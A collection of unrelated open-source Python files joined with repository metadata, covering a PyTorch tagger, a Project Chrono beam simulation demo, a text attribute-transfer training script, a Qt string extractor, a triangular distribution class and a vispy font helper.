[self.vocab['xpos'].unmap(sent) for sent in preds[1].tolist()] feats_seqs = [self.vocab['feats'].unmap(sent) for sent in preds[2].tolist()] pred_tokens = [[[upos_seqs[i][j], xpos_seqs[i][j], feats_seqs[i][j]] for j in range(sentlens[i])] for i in range(batch_size)] if unsort: pred_tokens = utils.unsort(pred_tokens, orig_idx) return pred_tokens def save(self, filename, skip_modules=True): model_state = self.model.state_dict() # skip saving modules like pretrained embeddings, because they are large and will be saved in a separate file if skip_modules: skipped = [k for k in model_state.keys() if k.split('.')[0] in self.model.unsaved_modules] for k in skipped: del model_state[k] params = { 'model': model_state, 'vocab': self.vocab.state_dict(), 'config': self.args } try: torch.save(params, filename, _use_new_zipfile_serialization=False) logger.info("Model saved to {}".format(filename)) except (KeyboardInterrupt, SystemExit): raise except Exception as e: logger.warning(f"Saving failed... {e} continuing anyway.") def load(self, filename, pretrain): """ Load a model from file, with preloaded pretrain embeddings. Here we allow the pretrain to be None or a dummy input, and the actual use of pretrain embeddings will depend on the boolean config "pretrain" in the loaded args. """ try: checkpoint = torch.load(filename, lambda storage, loc: storage) except BaseException: logger.error("Cannot load model from {}".format(filename)) raise self.args = checkpoint['config'] self.vocab = MultiVocab.load_state_dict(checkpoint['vocab']) # load model emb_matrix = None if self.args['pretrain'] and pretrain is not None: # we use pretrain only if args['pretrain'] == True and pretrain is not None emb_matrix = pretrain.emb self.model = Tagger(self.args, self.vocab, emb_matrix=emb_matrix, share_hid=self.args['share_hid']) self.model.load_state_dict(checkpoint['model'], strict=False)
41.226027
141
0.629174
818129558bddbc0505e05a60216047b21343fd82
10,725
py
Python
src/demos/python/fea/demo_FEA_beams_constr.py
Benatti1991/chrono
d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf
[ "BSD-3-Clause" ]
1,383
2015-02-04T14:17:40.000Z
2022-03-30T04:58:16.000Z
src/demos/python/fea/demo_FEA_beams_constr.py
Benatti1991/chrono
d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf
[ "BSD-3-Clause" ]
245
2015-01-11T15:30:51.000Z
2022-03-30T21:28:54.000Z
src/demos/python/fea/demo_FEA_beams_constr.py
Benatti1991/chrono
d927a7fae8ed2f4e6695cacaef28c605fcd9ffaf
[ "BSD-3-Clause" ]
351
2015-02-04T14:17:47.000Z
2022-03-30T04:42:52.000Z
# ============================================================================= # PROJECT CHRONO - http:#projectchrono.org # # Copyright (c) 2014 projectchrono.org # All rights reserved. # # Use of this source code is governed by a BSD-style license that can be found # in the LICENSE file at the top level of the distribution and at # http:#projectchrono.org/license-chrono.txt. # # ============================================================================= # Authors: Simone Benatti # ============================================================================= # # FEA for 3D beams and constraints # # ============================================================================= import math as m import pychrono as chrono import pychrono.fea as fea import pychrono.pardisomkl as pardiso import pychrono.irrlicht as chronoirr import os # Create a motor between the truss and the crank: class ChFunction_myf (chrono.ChFunction): def __init__(self): chrono.ChFunction.__init__(self) def Get_y(self,x): if (x > 0.4): return chrono.CH_C_PI else: return -chrono.CH_C_PI * (1.0 - m.cos(chrono.CH_C_PI * x / 0.4)) / 2.0 # Output directory out_dir = chrono.GetChronoOutputPath() + "BEAM_BUCKLING" print( "Copyright (c) 2017 projectchrono.org \n") # Create a Chrono::Engine physical system my_system = chrono.ChSystemSMC() # Create the Irrlicht visualization (open the Irrlicht device, # bind a simple user interface, etc. etc.) application = chronoirr.ChIrrApp(my_system, "Beams and constraints", chronoirr.dimension2du(800, 600)) # Easy shortcuts to add camera, lights, logo and sky in Irrlicht scene: application.AddTypicalLogo() application.AddTypicalSky() application.AddTypicalLights() application.AddTypicalCamera(chronoirr.vector3df(0.0, 0.6, -1.0)) L = 1 H = 0.25 K = 0.05 vA = chrono.ChVectorD(0, 0, 0) vC = chrono.ChVectorD(L, 0, 0) vB = chrono.ChVectorD(L, -H, 0) vG = chrono.ChVectorD(L - K, -H, 0) vd = chrono.ChVectorD(0, 0, 0.0001) # Create a truss: body_truss = chrono.ChBody() body_truss.SetBodyFixed(True) my_system.AddBody(body_truss) # Attach a 'box' shape asset for visualization. mboxtruss = chrono.ChBoxShape() mboxtruss.GetBoxGeometry().Pos = chrono.ChVectorD(-0.01, 0, 0) mboxtruss.GetBoxGeometry().SetLengths(chrono.ChVectorD(0.02, 0.2, 0.1)) body_truss.AddAsset(mboxtruss) # Create body for crank body_crank = chrono.ChBody() body_crank.SetPos((vB + vG) * 0.5) my_system.AddBody(body_crank) # Attach a 'box' shape asset for visualization. mboxcrank = chrono.ChBoxShape() mboxcrank.GetBoxGeometry().Pos = chrono.ChVectorD(0, 0, 0) mboxcrank.GetBoxGeometry().SetLengths(chrono.ChVectorD(K, 0.02, 0.02)) body_crank.AddAsset(mboxcrank) motor = chrono.ChLinkMotorRotationAngle() motor.Initialize(body_truss, body_crank, chrono.ChFrameD(vG)) myfun = ChFunction_myf() motor.SetAngleFunction(myfun) my_system.Add(motor) # Create a FEM mesh, that is a container for groups # of elements and their referenced nodes. my_mesh = fea.ChMesh() # Create the horizontal beam (use an IGA-beam finite element type, for example) beam_wy = 0.10 beam_wz = 0.01 # Create a section for the IGA beam. # IGA beams require ChBeamSectionCosserat sections, containing at least # a ChElasticityCosserat and ChInertiaCosserat models, and optional ChDampingCosserat and ChPlasticityCosserat. minertia = fea.ChInertiaCosseratSimple() minertia.SetAsRectangularSection(beam_wy, beam_wz, 2700) # automatically sets A etc., from width, height, density melasticity = fea.ChElasticityCosseratSimple() melasticity.SetYoungModulus(73.0e9) melasticity.SetGwithPoissonRatio(0.3) melasticity.SetAsRectangularSection(beam_wy, beam_wz) msection1 = fea.ChBeamSectionCosserat(minertia, melasticity) msection1.SetDrawThickness(beam_wy, beam_wz) builder_iga = fea.ChBuilderBeamIGA() builder_iga.BuildBeam(my_mesh, # the mesh to put the elements in msection1, # section of the beam 32, # number of sections (spans) vA, # start point vC, # end point chrono.VECT_Y, # suggested Y direction of section 3) # order (3 = cubic, etc) builder_iga.GetLastBeamNodes().front().SetFixed(True) node_tip = builder_iga.GetLastBeamNodes()[-1] node_mid = builder_iga.GetLastBeamNodes()[17] # Create the vertical beam (Here use Euler beams, for example). msection2 = fea.ChBeamSectionEulerAdvanced() hbeam_d = 0.024 msection2.SetDensity(2700) msection2.SetYoungModulus(73.0e9) msection2.SetGwithPoissonRatio(0.3) msection2.SetBeamRaleyghDamping(0.000) msection2.SetAsCircularSection(hbeam_d) builderA = fea.ChBuilderBeamEuler() builderA.BuildBeam(my_mesh, # the mesh where to put the created nodes and elements msection2, # the ChBeamSectionEulerAdvanced to use for the ChElementBeamEuler elements 3, # the number of ChElementBeamEuler to create vC + vd, # the 'A' poin space (beginning of beam) vB + vd, # the 'B' poin space (end of beam) chrono.ChVectorD(1, 0, 0)) # the 'Y' up direction of the section for the beam node_top = builderA.GetLastBeamNodes()[0] node_down = builderA.GetLastBeamNodes()[-1] # Create a constrabetween the vertical and horizontal beams: constr_bb = chrono.ChLinkMateGeneric() constr_bb.Initialize(node_top, node_tip, False, node_top.Frame(), node_top.Frame()) my_system.Add(constr_bb) constr_bb.SetConstrainedCoords(True, True, True, # x, y, z False, False, False) # Rx, Ry, Rz # For example, attach small shape to show the constraint msphereconstr2 = chrono.ChSphereShape() msphereconstr2.GetSphereGeometry().rad = 0.01 constr_bb.AddAsset(msphereconstr2) # Create a beam as a crank msection3 = fea.ChBeamSectionEulerAdvanced() crankbeam_d = 0.048 msection3.SetDensity(2700) msection3.SetYoungModulus(73.0e9) msection3.SetGwithPoissonRatio(0.3) msection3.SetBeamRaleyghDamping(0.000) msection3.SetAsCircularSection(crankbeam_d) builderB = fea.ChBuilderBeamEuler() builderB.BuildBeam(my_mesh, # the mesh where to put the created nodes and elements msection3, # the ChBeamSectionEulerAdvanced to use for the ChElementBeamEuler elements 3, # the number of ChElementBeamEuler to create vG + vd, # the 'A' poin space (beginning of beam) vB + vd, # the 'B' poin space (end of beam) chrono.ChVectorD(0, 1, 0)) # the 'Y' up direction of the section for the beam node_crankG = builderB.GetLastBeamNodes()[0] node_crankB = builderB.GetLastBeamNodes()[-1] # Create a constraint between the crank beam and body crank: constr_cbd = chrono.ChLinkMateGeneric() constr_cbd.Initialize(node_crankG, body_crank, False, node_crankG.Frame(), node_crankG.Frame()) my_system.Add(constr_cbd) constr_cbd.SetConstrainedCoords(True, True, True, # x, y, z True, True, True) # Rx, Ry, Rz # Create a constrabetween the vertical beam and the crank beam: constr_bc = chrono.ChLinkMateGeneric() constr_bc.Initialize(node_down, node_crankB, False, node_crankB.Frame(), node_crankB.Frame()) my_system.Add(constr_bc) constr_bc.SetConstrainedCoords(True, True, True, # x, y, z True, True, False) # Rx, Ry, Rz # For example, attach small shape to show the constraint msphereconstr3 = chrono.ChSphereShape() msphereconstr3.GetSphereGeometry().rad = 0.01 constr_bc.AddAsset(msphereconstr3) # # Final touches.. # # We do not want gravity effect on FEA elements in this demo my_mesh.SetAutomaticGravity(False) # Remember to add the mesh to the system! my_system.Add(my_mesh) # ==Asset== attach a visualization of the FEM mesh. # This will automatically update a triangle mesh (a ChTriangleMeshShape # asset that is internally managed) by setting proper # coordinates and vertex colors as in the FEM elements. # Such triangle mesh can be rendered by Irrlicht or POVray or whatever # postprocessor that can handle a colored ChTriangleMeshShape). # Do not forget AddAsset() at the end! mvisualizebeamA = fea.ChVisualizationFEAmesh(my_mesh) mvisualizebeamA.SetFEMdataType(fea.ChVisualizationFEAmesh.E_PLOT_ELEM_BEAM_MX) mvisualizebeamA.SetColorscaleMinMax(-500, 500) mvisualizebeamA.SetSmoothFaces(True) mvisualizebeamA.SetWireframe(False) my_mesh.AddAsset(mvisualizebeamA) mvisualizebeamC = fea.ChVisualizationFEAmesh(my_mesh) mvisualizebeamC.SetFEMglyphType(fea.ChVisualizationFEAmesh.E_GLYPH_NODE_CSYS) mvisualizebeamC.SetFEMdataType(fea.ChVisualizationFEAmesh.E_PLOT_NONE) mvisualizebeamC.SetSymbolsThickness(0.006) mvisualizebeamC.SetSymbolsScale(0.01) mvisualizebeamC.SetZbufferHide(False) my_mesh.AddAsset(mvisualizebeamC) # ==IMPORTANT!== Use this function for adding a ChIrrNodeAsset to all items # in the system. These ChIrrNodeAsset assets are 'proxies' to the Irrlicht meshes. # If you need a finer control on which item really needs a visualization proxy in # Irrlicht, just use application.AssetBind(myitem) on a per-item basis. application.AssetBindAll() # ==IMPORTANT!== Use this function for 'converting' into Irrlicht meshes the assets # that you added to the bodies into 3D shapes, they can be visualized by Irrlicht! application.AssetUpdateAll() # SIMULATION LOOP # Use a solver that can handle stiffnss matrices: pardiso_solver = pardiso.ChSolverPardisoMKL() my_system.SetSolver(pardiso_solver) application.SetTimestep(0.001) application.SetVideoframeSaveInterval(10) # Use the following for less numerical damping, 2nd order accuracy (but slower) ts = chrono.ChTimestepperHHT(my_system) ts.SetStepControl(False) my_system.SetTimestepper(ts) # Output data if not os.path.isdir(out_dir): print("Error creating directory " ) filename = out_dir + "/buckling_mid.dat" #file_out1 = chrono.ChStreamOutAsciiFile(filename) while (application.GetDevice().run()): application.BeginScene() application.DrawAll() chronoirr.drawGrid(application.GetVideoDriver(), 0.05, 0.05, 20, 20, chrono.ChCoordsysD(chrono.VNULL, chrono.CH_C_PI_2, chrono.VECT_Z), chronoirr.SColor(50, 90, 90, 90), True) application.DoStep() # Save output for the first 0.4 seconds #if (application.GetSystem().GetChTime() <= 0.4): #file_out1(application.GetSystem().GetChTime() + " " + node_mid.GetPos().z() + " " + node_mid.GetWvel_par().x() + "\n") application.EndScene()
38.16726
139
0.702657
87a00e56f2ce796eab88192eea693b22ec87a146
10,375
py
Python
method/mymodel-yelp/main.py
julian-pani/controllable-text-attribute-transfer
f60281702a37b681634b86c8597df542bafa64f5
[ "Apache-2.0" ]
null
null
null
method/mymodel-yelp/main.py
julian-pani/controllable-text-attribute-transfer
f60281702a37b681634b86c8597df542bafa64f5
[ "Apache-2.0" ]
null
null
null
method/mymodel-yelp/main.py
julian-pani/controllable-text-attribute-transfer
f60281702a37b681634b86c8597df542bafa64f5
[ "Apache-2.0" ]
null
null
null
# coding: utf-8 # requirements: pytorch: 0.4 # Author: Ke Wang # Contact: wangke17[AT]pku.edu.cn import time import argparse import math import os import torch import torch.nn as nn from torch import optim import numpy import matplotlib from matplotlib import pyplot as plt # Import your model files. from model import make_model, Classifier, NoamOpt, LabelSmoothing, fgim_attack from data import prepare_data, non_pair_data_loader, get_cuda, pad_batch_seuqences, id2text_sentence,\ to_var, calc_bleu, load_human_answer os.environ['CUDA_LAUNCH_BLOCKING'] = "1" # os.environ["CUDA_VISIBLE_DEVICES"] = "0" ###################################################################################### # Environmental parameters ###################################################################################### parser = argparse.ArgumentParser(description="Here is your model discription.") parser.add_argument('--id_pad', type=int, default=0, help='') parser.add_argument('--id_unk', type=int, default=1, help='') parser.add_argument('--id_bos', type=int, default=2, help='') parser.add_argument('--id_eos', type=int, default=3, help='') ###################################################################################### # File parameters ###################################################################################### parser.add_argument('--task', type=str, default='yelp', help='Specify datasets.') parser.add_argument('--word_to_id_file', type=str, default='', help='') parser.add_argument('--data_path', type=str, default='', help='') ###################################################################################### # Model parameters ###################################################################################### parser.add_argument('--word_dict_max_num', type=int, default=5, help='') parser.add_argument('--batch_size', type=int, default=128, help='') parser.add_argument('--max_sequence_length', type=int, default=60) parser.add_argument('--num_layers_AE', type=int, default=2) parser.add_argument('--transformer_model_size', type=int, default=256) parser.add_argument('--transformer_ff_size', type=int, default=1024) parser.add_argument('--latent_size', type=int, default=256) parser.add_argument('--word_dropout', type=float, default=1.0) parser.add_argument('--embedding_dropout', type=float, default=0.5) parser.add_argument('--learning_rate', type=float, default=0.001) parser.add_argument('--label_size', type=int, default=1) parser.add_argument('--load_from_checkpoint', type=int, default=False) parser.add_argument('--checkpoint_name', type=str, default="") args = parser.parse_args() # args.if_load_from_checkpoint = False # args.if_load_from_checkpoint = True # args.checkpoint_name = "1569079093" ###################################################################################### # End of hyper parameters ###################################################################################### def add_log(ss): now_time = time.strftime("[%Y-%m-%d %H:%M:%S]: ", time.localtime()) print(now_time + ss) with open(args.log_file, 'a') as f: f.write(now_time + str(ss) + '\n') return def add_output(ss): with open(args.output_file, 'a') as f: f.write(str(ss) + '\n') return def preparation(): # set model save path if args.load_from_checkpoint: timestamp = args.checkpoint_name else: timestamp = str(int(time.time())) print("create new model save path: %s" % timestamp) args.current_save_path = 'save/%s/' % timestamp args.log_file = args.current_save_path + time.strftime("log_%Y_%m_%d_%H_%M_%S.txt", time.localtime()) args.output_file = args.current_save_path + time.strftime("output_%Y_%m_%d_%H_%M_%S.txt", time.localtime()) print("create log file at path: %s" % args.log_file) if os.path.exists(args.current_save_path): add_log("Load checkpoint model from Path: %s" % args.current_save_path) else: os.makedirs(args.current_save_path) add_log("Path: %s is created" % args.current_save_path) # set task type if args.task == 'yelp': args.data_path = '../../data/yelp/processed_files/' elif args.task == 'amazon': args.data_path = '../../data/amazon/processed_files/' elif args.task == 'imagecaption': pass else: raise TypeError('Wrong task type!') # prepare data args.id_to_word, args.vocab_size, \ args.train_file_list, args.train_label_list = prepare_data( data_path=args.data_path, max_num=args.word_dict_max_num, task_type=args.task ) return def train_iters(ae_model, dis_model): train_data_loader = non_pair_data_loader( batch_size=args.batch_size, id_bos=args.id_bos, id_eos=args.id_eos, id_unk=args.id_unk, max_sequence_length=args.max_sequence_length, vocab_size=args.vocab_size ) train_data_loader.create_batches(args.train_file_list, args.train_label_list, if_shuffle=True) add_log("Start train process.") ae_model.train() dis_model.train() ae_optimizer = NoamOpt(ae_model.src_embed[0].d_model, 1, 2000, torch.optim.Adam(ae_model.parameters(), lr=0, betas=(0.9, 0.98), eps=1e-9)) dis_optimizer = torch.optim.Adam(dis_model.parameters(), lr=0.0001) ae_criterion = get_cuda(LabelSmoothing(size=args.vocab_size, padding_idx=args.id_pad, smoothing=0.1)) dis_criterion = nn.BCELoss(size_average=True) for epoch in range(200): print('-' * 94) epoch_start_time = time.time() for it in range(train_data_loader.num_batch): batch_sentences, tensor_labels, \ tensor_src, tensor_src_mask, tensor_tgt, tensor_tgt_y, \ tensor_tgt_mask, tensor_ntokens = train_data_loader.next_batch() # Forward pass latent, out = ae_model.forward(tensor_src, tensor_tgt, tensor_src_mask, tensor_tgt_mask) # Loss calculation loss_rec = ae_criterion(out.contiguous().view(-1, out.size(-1)), tensor_tgt_y.contiguous().view(-1)) / tensor_ntokens.data ae_optimizer.optimizer.zero_grad() loss_rec.backward() ae_optimizer.step() # Classifier dis_lop = dis_model.forward(to_var(latent.clone())) loss_dis = dis_criterion(dis_lop, tensor_labels) dis_optimizer.zero_grad() loss_dis.backward() dis_optimizer.step() if it % 200 == 0: add_log( '| epoch {:3d} | {:5d}/{:5d} batches | rec loss {:5.4f} | dis loss {:5.4f} |'.format( epoch, it, train_data_loader.num_batch, loss_rec, loss_dis)) print(id2text_sentence(tensor_tgt_y[0], args.id_to_word)) generator_text = ae_model.greedy_decode(latent, max_len=args.max_sequence_length, start_id=args.id_bos) print(id2text_sentence(generator_text[0], args.id_to_word)) add_log( '| end of epoch {:3d} | time: {:5.2f}s |'.format( epoch, (time.time() - epoch_start_time))) # Save model torch.save(ae_model.state_dict(), args.current_save_path + 'ae_model_params.pkl') torch.save(dis_model.state_dict(), args.current_save_path + 'dis_model_params.pkl') return def eval_iters(ae_model, dis_model): eval_data_loader = non_pair_data_loader( batch_size=1, id_bos=args.id_bos, id_eos=args.id_eos, id_unk=args.id_unk, max_sequence_length=args.max_sequence_length, vocab_size=args.vocab_size ) eval_file_list = [ args.data_path + 'sentiment.test.0', args.data_path + 'sentiment.test.1', ] eval_label_list = [ [0], [1], ] eval_data_loader.create_batches(eval_file_list, eval_label_list, if_shuffle=False) gold_ans = load_human_answer(args.data_path) assert len(gold_ans) == eval_data_loader.num_batch add_log("Start eval process.") ae_model.eval() dis_model.eval() for it in range(eval_data_loader.num_batch): batch_sentences, tensor_labels, \ tensor_src, tensor_src_mask, tensor_tgt, tensor_tgt_y, \ tensor_tgt_mask, tensor_ntokens = eval_data_loader.next_batch() print("------------%d------------" % it) print(id2text_sentence(tensor_tgt_y[0], args.id_to_word)) print("origin_labels", tensor_labels) latent, out = ae_model.forward(tensor_src, tensor_tgt, tensor_src_mask, tensor_tgt_mask) generator_text = ae_model.greedy_decode(latent, max_len=args.max_sequence_length, start_id=args.id_bos) print(id2text_sentence(generator_text[0], args.id_to_word)) # Define target label target = get_cuda(torch.tensor([[1.0]], dtype=torch.float)) if tensor_labels[0].item() > 0.5: target = get_cuda(torch.tensor([[0.0]], dtype=torch.float)) print("target_labels", target) modify_text = fgim_attack(dis_model, latent, target, ae_model, args.max_sequence_length, args.id_bos, id2text_sentence, args.id_to_word, gold_ans[it]) add_output(modify_text) return if __name__ == '__main__': print(args.load_from_checkpoint) print(args.checkpoint_name) preparation() ae_model = get_cuda(make_model(d_vocab=args.vocab_size, N=args.num_layers_AE, d_model=args.transformer_model_size, latent_size=args.latent_size, d_ff=args.transformer_ff_size, )) dis_model = get_cuda(Classifier(latent_size=args.latent_size, output_size=args.label_size)) if args.load_from_checkpoint: # Load models' params from checkpoint ae_model.load_state_dict(torch.load(args.current_save_path + 'ae_model_params.pkl')) dis_model.load_state_dict(torch.load(args.current_save_path + 'dis_model_params.pkl')) else: train_iters(ae_model, dis_model) eval_iters(ae_model, dis_model) print("Done!")
39.599237
111
0.611181
d95b8a27ac2ebdd5e4b8ab34161bb2137f577510
1,805
py
Python
share/qt/extract_strings_qt.py
wizadr/DiminutiveCoin
678ac688217b4578308c3a9cd6ccd1e7a08ecaf4
[ "MIT" ]
1
2022-03-27T20:06:29.000Z
2022-03-27T20:06:29.000Z
share/qt/extract_strings_qt.py
MadCatMining/DiminutiveCoin
678ac688217b4578308c3a9cd6ccd1e7a08ecaf4
[ "MIT" ]
null
null
null
share/qt/extract_strings_qt.py
MadCatMining/DiminutiveCoin
678ac688217b4578308c3a9cd6ccd1e7a08ecaf4
[ "MIT" ]
2
2022-01-10T00:41:44.000Z
2022-02-24T09:11:26.000Z
#!/usr/bin/python ''' Extract _("...") strings for translation and convert to Qt4 stringdefs so that they can be picked up by Qt linguist. ''' from subprocess import Popen, PIPE import glob OUT_CPP="src/qt/diminutivecoinstrings.cpp" EMPTY=['""'] def parse_po(text): """ Parse 'po' format produced by xgettext. Return a list of (msgid,msgstr) tuples. """ messages = [] msgid = [] msgstr = [] in_msgid = False in_msgstr = False for line in text.split('\n'): line = line.rstrip('\r') if line.startswith('msgid '): if in_msgstr: messages.append((msgid, msgstr)) in_msgstr = False # message start in_msgid = True msgid = [line[6:]] elif line.startswith('msgstr '): in_msgid = False in_msgstr = True msgstr = [line[7:]] elif line.startswith('"'): if in_msgid: msgid.append(line) if in_msgstr: msgstr.append(line) if in_msgstr: messages.append((msgid, msgstr)) return messages files = glob.glob('src/*.cpp') + glob.glob('src/*.h') # xgettext -n --keyword=_ $FILES child = Popen(['xgettext','--output=-','-n','--keyword=_'] + files, stdout=PIPE) (out, err) = child.communicate() messages = parse_po(out) f = open(OUT_CPP, 'w') f.write("""#include <QtGlobal> // Automatically generated by extract_strings.py #ifdef __GNUC__ #define UNUSED __attribute__((unused)) #else #define UNUSED #endif """) f.write('static const char UNUSED *diminutivecoin_strings[] = {') for (msgid, msgstr) in messages: if msgid != EMPTY: f.write('QT_TRANSLATE_NOOP("diminutivecoin-core", %s),\n' % ('\n'.join(msgid))) f.write('};') f.close()
25.422535
87
0.584488
f7a7a62d7f576e49e998225fc0a68717990c829d
7,044
py
Python
probdists/Triangulardistribution.py
m0hit-kumar/probdists
786d4f6c53534c318499d97200355f94c8c48919
[ "MIT" ]
null
null
null
probdists/Triangulardistribution.py
m0hit-kumar/probdists
786d4f6c53534c318499d97200355f94c8c48919
[ "MIT" ]
null
null
null
probdists/Triangulardistribution.py
m0hit-kumar/probdists
786d4f6c53534c318499d97200355f94c8c48919
[ "MIT" ]
null
null
null
import math import matplotlib.pyplot as plt from .Generaldistribution import Distribution from collections import Counter import seaborn as sns class Triangular(Distribution): """ Triangular distribution class for calculating and visualizing the triangular distribution: a continuous probability distribution shaped like a triangle Note: a <= mode <= b Attributes: a (float): the minimum lower limit value b (float): the maximum upper limit value mode (float): the mode, where min <= mode <= max mean (float): the mean value of the distribution stdev (float): the standard deviation of the distribution """ def __init__(self, a=0, b=1, mode=0.5): if b < mode < a or a == b: raise ValueError if a == b or a == mode or b == mode: raise TriangularValueException() self.a = a self.b = b self.mode = mode Distribution.__init__(self, self.calculate_mean(), self.calculate_stdev()) def calculate_mean(self, round_to=2): """ Method to calculate the mean from the min, max and mode Args: round_to (int): Round the mean value. Defaults to 2. Returns: float: mean of the data set """ self.mean = 1 / 3 * (self.a + self.b + self.mode) return round(self.mean, round_to) def calculate_stdev(self, round_to=2): """ Method to calculate the standard deviation from the min, max and mode Args: round_to (int): Round the mean value. Defaults to 2. Returns: float: standard deviation of the data set """ summation = ( (self.a ** 2) + (self.b ** 2) + (self.mode ** 2) - (self.a * self.b) - (self.a * self.mode) - (self.b * self.mode) ) variance = summation / 18 self.stdev = math.sqrt(variance) return round(self.stdev, round_to) def replace_stats_with_data(self): """Method to calculate a, b, mode from the data set Args: None Returns: float: a, the minimum value float: b, the maximum value float: mode, the mode of the dataset """ if not self.data: # Use default values min_a, max_b, mode = 0, 1, 0.5 else: min_a = min(self.data) max_b = max(self.data) mode = self.calculate_mode() if min == max or min == mode or max == mode: raise TriangularValueException() self.a = min_a self.b = max_b self.mode = mode return self.a, self.b, self.mode def calculate_mode(self, round_to=2): """ Calculates the mode of a dataset If no single mode, it will approximate the mode using the mean Args: round_to (int): Round the mode value. [Default value: 2] Returns: float: mode of data """ frequency_dict = dict(Counter(self.data)) max_frequency = max(list(frequency_dict.values())) # Create list of modes from data mode = [k for k, v in frequency_dict.items() if v == max_frequency] if len(mode) == 1: return mode[0] else: # Multiple modes msg = f"""Multiple modes found: {str(mode)}, Triangular Distribution requires single mode""" raise TriangularValueException(msg) def calculate_pdf(self, x, round_to=2): """ Probability density function calculator for the Triangular distribution. Args: x (float): point for calculating the probability density function round_to (int): Round the pdf value. [Default value: 2] Returns: float: probability density function """ # Check equivalence if self.a == self.b or self.a == self.mode or self.b == self.mode: raise TriangularValueException() value = 0 # default value for when x < min or x > max if self.a <= x < self.mode: value = (2 * (x - self.a)) / ((self.b - self.a) * (self.mode - self.a)) elif self.mode == x: value = 2 / (self.b - self.a) elif self.mode < x <= self.b: value = (2 * (self.b - x)) / ((self.b - self.a) * (self.b - self.mode)) self.pdf = value return round(self.pdf, round_to) def calculate_cdf(self, x, round_to=2): """ Cumulative density function calculator for the Triangular distribution. Args: x (float): point for calculating the cumulative density function round_to (int): Round the value. [Default value: 2] Returns: float: cumulative density function output """ # Check equivalence if self.a == self.b or self.a == self.mode or self.b == self.mode: raise TriangularValueException() if x < self.a: value = 0 elif self.a <= x <= self.mode: num = (x - self.a) ** 2 den = (self.b - self.a) * (self.mode - self.a) value = num / den elif self.mode < x <= self.b: num = (self.b - x) ** 2 den = (self.b - self.a) * (self.b - self.mode) value = 1 - (num / den) else: value = 1 self.cdf = value return round(self.cdf, round_to) def plot_bar_pdf(self): """ Method to plot the pdf of the triangular distribution. Args: self Returns: None """ x = [self.a, self.mode, self.b] peak = 2 / (self.b - self.a) y = [0, peak, 0] sns.lineplot(x, y).set( title="Probability Density Plot for Triangular Distribution", xlabel="Probability", ylabel="x", ) plt.show() return x, y def __repr__(self): """ Outputs the characteristics of the Triangular Distribution instance. Args: self Returns: string: characteristics of the Triangle """ return ( f"minimum: {self.a}, maximum: {self.b}, mode: {self.mode}, " f"mean: {self.mean}, standard deviation: {self.stdev}" ) class TriangularValueException(Exception): """ Defines Exception raised when minimum, maximum or mode values are equal and TriangularDistribution instance cannot be created Attributes: message (str): Error message to return """ def __init__(self, msg=None): if msg is not None: self.message = msg else: self.message = "Minimum, Maximum, or Mode cannot be equivalent" def __str__(self): if self.message: return f"""TriangularValueException: {self.message}""" return f"""TriangularValueException Raised"""
28.634146
104
0.548978
d94e48635e9d2ef72aafeb89e0cd91465420f984
1,167
py
Python
shuter/shooter_game.py
vlax679/shuter
8df27dfc9f6686df4f7b97ac831fb9518ea7da95
[ "CC0-1.0" ]
null
null
null
shuter/shooter_game.py
vlax679/shuter
8df27dfc9f6686df4f7b97ac831fb9518ea7da95
[ "CC0-1.0" ]
null
null
null
shuter/shooter_game.py
vlax679/shuter
8df27dfc9f6686df4f7b97ac831fb9518ea7da95
[ "CC0-1.0" ]
null
null
null
from pygame import * #создай окно игры window = display.set_mode((800,600)) display.set_caption("Шутер") background = transform.scale(image.load("galaxy.jpg"),(800,600)) #задай фон сцены clock = time.Clock() FPS = 100 #создай 2 спрайта и размести их на сцене mixer.init() mixer.music.load("space.ogg") mixer.music.play() #обработай событие «клик по кнопке "Закрыть окно"» class Player(sprite.Sprite): def __init__(self,picture,speed,sx,sy,window): self.picture = picture self.speed = speed self.sx = sx self.sy = sy self.sub = transform.scale(image.load(self.picture),(100,100)) self.window = window def update(self): self.window.blit(self.sub,(self.sx,self.sy)) keys_pressed = key.get_pressed() if keys_pressed[K_d] and self.sx < 800: self.sx += self.speed if keys_pressed[K_a] and self.sx >0: self.sx -= self.speed x = 3 y = 500 game = True player = Player("rocket.png",10,x,y,window) while game: window.blit(background,(0,0)) player.update() for e in event.get(): if e.type == QUIT: game=False clock.tick(FPS)
25.369565
70
0.634105
2ba6252815a9e7af063eb544b38007c502f9003b
847
py
Python
tests/test_mysql_connection_pool.py
maypimentel/mysql_connection_pool
a6d193ee62d24fbc9aec449dd3bc9bf00375927d
[ "MIT" ]
null
null
null
tests/test_mysql_connection_pool.py
maypimentel/mysql_connection_pool
a6d193ee62d24fbc9aec449dd3bc9bf00375927d
[ "MIT" ]
null
null
null
tests/test_mysql_connection_pool.py
maypimentel/mysql_connection_pool
a6d193ee62d24fbc9aec449dd3bc9bf00375927d
[ "MIT" ]
null
null
null
import pytest from mysql_connection_pool import MysqlPool from mysql.connector import MySQLConnection from mysql.connector.errors import PoolError class TestMysqlConnectionPool: def setup_method(self, method): self.pool = MysqlPool(pool_size=2, pool_max_size=2) def test_cnx_type(self): cnx = self.pool.get_connection() assert isinstance(cnx, MySQLConnection) def test_cnx_and_cursor(self): cnx = self.pool.get_connection() cursor = cnx.cursor() cursor.execute('SELECT * FROM book LIMIT 1;') cursor.fetchall() assert cursor.rowcount == 1 def test_pool_empty(self): cnx1 = self.pool.get_connection() cnx2 = self.pool.get_connection() with pytest.raises(PoolError, match='Pool exhausted'): cnx3 = self.pool.get_connection()
31.37037
62
0.68477
335ebe7bff7191a76f4fdddea8e48d3a68f98df0
747
py
Python
vispy/util/fonts/_vispy_fonts.py
shjoshi/vispy
2f3d169aa60c738467e766c59096f51570483d6f
[ "BSD-3-Clause" ]
null
null
null
vispy/util/fonts/_vispy_fonts.py
shjoshi/vispy
2f3d169aa60c738467e766c59096f51570483d6f
[ "BSD-3-Clause" ]
null
null
null
vispy/util/fonts/_vispy_fonts.py
shjoshi/vispy
2f3d169aa60c738467e766c59096f51570483d6f
[ "BSD-3-Clause" ]
null
null
null
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright (c) 2014, Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. # ----------------------------------------------------------------------------- from .._data import get_data_file # List the vispy fonts made available online _vispy_fonts = ('OpenSans', 'Cabin') def _get_vispy_font_filename(face, bold, italic): """Fetch a remote vispy font""" name = face + '-' name += 'Regular' if not bold and not italic else '' name += 'Bold' if bold else '' name += 'Italic' if italic else '' name += '.ttf' return get_data_file('fonts/%s' % name)
35.571429
79
0.519411